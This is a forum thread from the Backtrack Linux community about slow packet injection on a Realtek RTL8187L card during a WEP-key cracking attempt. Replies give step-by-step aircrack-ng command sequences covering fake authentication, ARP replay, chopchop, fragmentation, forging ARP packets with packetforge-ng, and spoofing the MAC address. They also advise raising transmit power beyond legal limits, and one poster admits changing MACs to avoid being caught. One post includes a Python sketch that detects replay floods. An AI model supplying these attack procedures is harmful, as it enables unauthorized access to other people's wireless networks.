
Thread: Realtek RTL8187L Packet Injection speed issue in Backtrack 5 R1

  1. #1
    Just burned his ISO
    Join Date
    Oct 2011
    Location
    Puerto Rico
    Posts
    4

    Realtek RTL8187L Packet Injection speed issue in Backtrack 5 R1

    Hello to everyone. I have an Asus M2N32SLI DELUXE motherboard that has the RTL8187L chipset integrated.

    1. I am using (and experimenting) with Backtrack 5 R1

    2. I boot from the Backtrack 5 R1 boot DVD from the Post.


    The problem: I do the whole process up to the packet injection, but I see that the DATA field always receives data very slowly, although the pps = 499 or 500. I remember that the Tx = -60 or something like that, since I read that this represents the actual voltage set in the wireless network card.

    I want to know if someone knows how to speed up this process, since the instructions for cracking WEP explain that to start cracking the WEP key we need to have about 20,000 data packets or IVs.

    For example, I waited about 2 hours, and the Data field has just 399 packets, VERY SLOW.

    Well, remember I use the Backtrack 5 R1 boot DVD.

    I wait for an answer.

    Bye

  2. #2
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Re: Realtek RTL8187L Packet Injection speed issue in Backtrack 5 R1

    Just because you're transmitting does not mean you are injecting. You need to try different attacks. If you give me a list of EVERY command, start to finish, that you have used, and what type of network (WEP/SKA/OPEN...) you have used them on, then I'd be more than happy to give you suggestions.
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  3. #3
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Re: Realtek RTL8187L Packet Injection speed issue in Backtrack 5 R1

    If signal strength is low, slowing how many packets per second are being injected can help greatly. You will see fewer packet drops in airodump when you're at a good speed.
    Use the -x option with aireplay to control the number of PPS. Default is 500; sometimes I might do 200, sometimes I might do 25. It depends on the signal strength, and I've seen some routers sort of get overloaded if you hit them too much.

  4. #4
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Re: Realtek RTL8187L Packet Injection speed issue in Backtrack 5 R1

    Again, just because packets are being sent from your card does not mean the AP is responding to them. I've tested many networks, and when the AP wasn't responding, then it wouldn't respond no matter how many pps you were sending, 1 or 1000. Sending fewer packets only helps when the AP is generating IVs anyway, but can't keep up with you. His AP is not. Otherwise, he'd have a lot more IVs than 399. Therefore, he has not successfully injected anything. Your best bet is to switch up attacks and hope the router responds to that one. Also again, I'd be very happy to help. I enjoy doing this kind of thing.
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  5. #5
    Just burned his ISO
    Join Date
    Oct 2011
    Location
    Puerto Rico
    Posts
    4

    Re: Realtek RTL8187L Packet Injection speed issue in Backtrack 5 R1

    Hello Mr. ShadowMaster. Thanks for the answer. The wireless network uses WEP-based encryption. Well, I read you want to see what commands I used when doing the whole process, right? If so, here is a list of all:

    1. iwconfig

    2. airmon-ng stop [device]

    3. ifconfig [interface] down

    4. macchanger --mac 00:11:22:33:44:66 [device]

    5. airmon-ng start [device]

    6. airodump-ng [device]

    7. airodump-ng -c [channel] -w [network.out] --bssid [bssid] [device]

    8. aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]

    9. aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

    10. aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

    11. aircrack-ng -n 128 -b [bssid] [filename]-01.cap


    Well, I hope this can help you. But remember that I saw a Power Level (Tx) of only 20 db in my wireless card when I execute the command "iwconfig".


    See you new friend,

    thanks

  6. #6
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Re: Realtek RTL8187L Packet Injection speed issue in Backtrack 5 R1

    Hi,
    - First step, to increase txpower (in MY country it is not legal!):
    iw reg set BO ".........livia"
    iwconfig [device, e.g. wlan0] txpower 30
    airmon-ng start wlan0
    etc.
    In my limited experience, an increase in txpower works well for "receiving data", but for a "normal connection" 20db is more stable on my Alfa.
    Bye

  7. #7
    Just burned his ISO
    Join Date
    Oct 2011
    Location
    San Diego, CA
    Posts
    21

    Re: Realtek RTL8187L Packet Injection speed issue in Backtrack 5 R1

    Try a simple injection test (replace wlan0 with your wireless interface). Also, you must set your card to monitor mode and to the desired channel with airmon-ng prior to running any of the tests.
    Code:
     aireplay-ng -9 wlan0
    You can also take a look at the documentation:
    Usage

    aireplay-ng -9 -e teddy -a 00:de:ad:ca:fe:00 -i wlan1 wlan0

    Where:

    -9 means injection test. Long form is --test.
    -e teddy is the network name (SSID). This is optional.
    -a 00:de:ad:ca:fe:00 ath0 is MAC address of the access point (BSSID). This is optional.
    -i wlan1 is interface name of the second card if you want to determine which attacks your card supports. This interface acts as an AP and receives packets. This is optional.
    wlan0 is the interface name or airserv-ng IP Address plus port number. This interface is used to send packets. For example - 127.0.0.1:666. (Mandatory)
    Sometimes you aren't physically close enough to inject packets. If you have $30 to blow, I'd suggest getting an Alfa AWUS036H.

  8. #8
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Re: Realtek RTL8187L Packet Injection speed issue in Backtrack 5 R1

    Originally posted by joecrank:
    Hello Mr. ShadowMaster. Thanks for the answer. The wireless network uses WEP-based encryption. Well, I read you want to see what commands I used when doing the whole process, right? If so, here is a list of all:

    1. iwconfig

    2. airmon-ng stop [device]

    3. ifconfig [interface] down

    4. macchanger --mac 00:11:22:33:44:66 [device]

    5. airmon-ng start [device]

    6. airodump-ng [device]

    7. airodump-ng -c [channel] -w [network.out] --bssid [bssid] [device]

    8. aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]

    9. aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

    10. aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

    11. aircrack-ng -n 128 -b [bssid] [filename]-01.cap


    Well, I hope this can help you. But remember that I saw a Power Level (Tx) of only 20 db in my wireless card when I execute the command "iwconfig".


    See you new friend,

    thanks
    Sorry for the delay. Ok, from what I see you've been using both an ARP replay and an interactive packet replay. Since you didn't specify, I'm gonna assume no SKA to bypass. So, try this:

    1. iwconfig

    2. airmon-ng stop [device]

    3. ifconfig [interface] down

    4. macchanger --mac 00:11:22:33:44:66 [device]

    5. airmon-ng start [device]

    6. airodump-ng [device]

    7. airodump-ng -c [channel] -w [network.out] --bssid [bssid] [device]

    8. aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
    Now I start running into issues. By default, without the -h, aireplay will use the device MAC. Since you've already changed it, why keep putting it in? Try it without the -h to see that I'm correct and save yourself a lot of typing. If not, just keep it this way. Moving on...

    9. aireplay-ng -4 -a [bssid] [device] (remember to add -h if I'm wrong)
    if this attack fails then try this one
    9.a aireplay-ng -5 -b [bssid] [device]
    both of these will get you the PRGA XOR stream to forge an arp packet to inject.

    When one of them works, get the .xor file that was outputted (ls, or just read the terminal, it'll say after the attack succeeds).

    Now things get complicated. If you used attack -4 (korek chopchop) then use tcpdump to view the saved decrypted packet (which is listed in the terminal output):
    tcpdump -s0 -n -e -r [packet] (usually something like packet-dec-xxxx.cap)
    Search for the IP address inside the packet and remember it.

    If you used packet fragmentation (-5) then it's easier but not necessarily as effective (no ARP amplification).
    You're just gonna use broadcast addresses for the IPs.
    For -5:
    packetforge-ng -0 -a [bssid] -h [device mac] -k 255.255.255.255 -l 255.255.255.255 -y [.xor file] -w arppac.cap

    for -4
    packetforge-ng -0 -a [bssid] -h [device mac] -k [valid ip on network] -l [use the ip scheme (i.e. 192.168.1.) it should usually be 192.168.[different things] use it to create something like this ipscheme.ipscheme.ipscheme.255 (example 192.168.40.255)] -y [.xor file] -w arppac.cap
    This command is confusing so I'll give a full example:
    packetforge-ng -0 -a [bssid] -h [device mac] -k 192.168.2.45 -l 192.168.2.255 -y [.xor file] -w arppac.cap

    next
    aireplay-ng -2 -r arppac.cap

    If this doesn't inject, let me know, and we will try another attack.
    If it does inject then wait until at least 20,000 data# then
    aircrack-ng [-w file from airodump-ng]
    Don't use any modifiers, it won't really help, and this way has cracked keys in less than a second for me with 50,000+ and in 5-10 seconds with 10,000-20,000.
    Btw, the script located at http://www.backtrack-linux.org/forum...ifi-101-a.html there should help a lot.
    Let me know what you do.
    Last edited by ShadowMaster; 10-23-2011 at 01:36 AM.
    World Domination is such an ugly phrase. I prefer the term World Optimization.
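
Seen from the monitoring side, the ARP replay and interactive replay discussed in this thread (frame control 0841, destination FF:FF:FF:FF:FF:FF, up to 500 pps) show up as one source repeating an identical protected broadcast frame at a high rate. The sketch below is an added example, not part of the original posts; the frame-metadata tuple layout, the thresholds, the sample data and the function names are all assumptions.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

def build_sample():
    """Constructed frame metadata: (time_ms, src, dst, frame_control, length)."""
    frames = []
    # Ordinary client traffic: unicast frames of varying size.
    for i in range(20):
        frames.append((i * 500, "aa:bb:cc:00:00:01", "aa:bb:cc:00:00:fe",
                       "0841", 90 + 37 * (i % 5)))
    # A legitimate client sending an occasional broadcast frame.
    for i in range(3):
        frames.append((1000 + i * 3000, "aa:bb:cc:00:00:02", BROADCAST, "0841", 68))
    # Replay flood: one identical 68-byte frame every 2 ms (500 pps) for 3 s.
    for i in range(1500):
        frames.append((2000 + i * 2, "00:11:22:33:44:66", BROADCAST, "0841", 68))
    return sorted(frames)

def detect_replay(frames, window_ms=1000, min_count=100):
    """Return {src: peak count} for sources that send at least min_count
    same-length protected broadcast frames within a sliding window."""
    windows = defaultdict(deque)   # (src, length) -> timestamps inside the window
    peaks = {}
    for ts, src, dst, fc, length in frames:
        # Only data frames with ToDS + Protected set (0841) sent to broadcast.
        if fc.lower() != "0841" or dst.lower() != BROADCAST:
            continue
        q = windows[(src, length)]
        q.append(ts)
        while ts - q[0] > window_ms:   # drop timestamps older than the window
            q.popleft()
        if len(q) >= min_count:
            peaks[src] = max(peaks.get(src, 0), len(q))
    return peaks

if __name__ == "__main__":
    for src, peak in detect_replay(build_sample()).items():
        print(f"possible replay flood from {src}: {peak} identical frames per window")
```

A sender throttled well below `min_count` per window, as with the lower -x values mentioned earlier in the thread, stays under this threshold, so the threshold has to be tuned against the normal broadcast rate of the network being monitored.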

  9. #9
    Senior Member
    Join Date
    Jul 2011
    Posts
    236

    Re: Realtek RTL8187L Packet Injection speed issue in Backtrack 5 R1

    ShadowMaster,

    Thank you for the post man! I didn't really get the response I was looking for with my script; but with what you just posted advising people to use my script.... I have a smile the size of Texas across my face. Thank you so much!!!
    V/r,
    Snafu
    Pffbt.. "I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.."

  10. #10
    Senior Member
    Join Date
    Jul 2011
    Posts
    236

    Re: Realtek RTL8187L Packet Injection speed issue in Backtrack 5 R1

    Originally posted by joecrank:
    Hello Mr. ShadowMaster. Thanks for the answer. The wireless network uses WEP-based encryption. Well, I read you want to see what commands I used when doing the whole process, right? If so, here is a list of all:

    ......
    3. ifconfig [interface] down

    4. macchanger --mac 00:11:22:33:44:66 [device]

    5. airmon-ng start [device]
    If you change the MAC address of the physical device and then use airmon-ng you defeat the purpose of a MAC change =)....do an ifconfig of the physical device and look at the mac, then macchange it....then airmon-ng start it, then ifconfig the virtual device (mon0)....mon0 will have the MAC that is burned into the card =)...You need to do the steps in this order bro =)...Out of sheer curiosity, why are ya changing MACs =)...I only change my MAC when I want to play sneaky games...(i.e....Not be Caught)
    Code:
    airmon-ng start <dev>
    ifconfig <dev> down
    ifconfig mon0 down
    macchanger -m 00:11:22:33:44:66 <dev>
    macchanger -m 00:11:22:33:44:66 mon0
    ifconfig <dev> up
    ifconfig mon0 up
    V/r,
    Snafu
    Pffbt.. "I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.."
